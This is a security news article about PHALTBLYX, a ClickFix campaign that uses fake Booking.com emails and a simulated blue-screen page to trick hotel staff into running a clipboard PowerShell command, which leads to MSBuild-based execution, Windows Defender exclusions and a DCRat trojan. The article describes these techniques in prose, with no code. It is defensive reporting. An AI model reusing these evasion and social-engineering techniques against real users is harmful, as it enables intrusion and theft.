ClickFix Campaign Mimics Windows Crash to Deploy Malware

A highly sophisticated malware campaign, dubbed PHALTBLYX, has surfaced, leveraging social engineering tactics alongside advanced evasion methods to infiltrate organizations in the hospitality sector.

The campaign initiates with phishing emails masquerading as Booking.com notifications, warning recipients of urgent reservation cancellations and highlighting substantial charges in euros to create a sense of alarm.

These emails redirect victims to counterfeit Booking.com websites that closely mimic the legitimate platform’s design and functionality, capitalizing on user anxiety over potential financial fraud to drive engagement.

The attack moves through a meticulously planned sequence of steps intended to get over conventional security measures. A full-screen blue screen of death animation appears in the victims’ browsers once they click the refresh button on the phony page.

Users are prompted to press keyboard combinations to follow on-screen directions during this simulated crash.

The malware secretly transfers a PowerShell command to the clipboard, which victims unintentionally run when they follow the presented instructions, according to Securonix analysts.

This click-fix social engineering technique is a significant advancement in the attack’s distribution mechanism, according to Securonix experts.

By using manual user execution instead of automated processes, the method successfully gets around security measures that would prevent script execution.

While downloading an MSBuild project file from distant servers, the malicious PowerShell command opens the authentic Booking.com admin page as a diversion.

Using a method called “living off the land,” the infection process uses Microsoft’s official MSBuild.exe compiler to run the downloaded v.proj file.

This method enables malware to avoid antivirus detection and program whitelisting by proxying execution through reliable Windows utilities.

The malware ensures that successive payloads go unnoticed by disabling Windows Defender after it has been executed by introducing broad file extension exclusions and specific directory exclusions.

The finished payload is a modified version of the remote access trojan DCRat, which may compromise a large portion of a system. By hiding internet shortcut files in the Windows startup folder under the appearance of trustworthy system programs, the RAT creates persistence.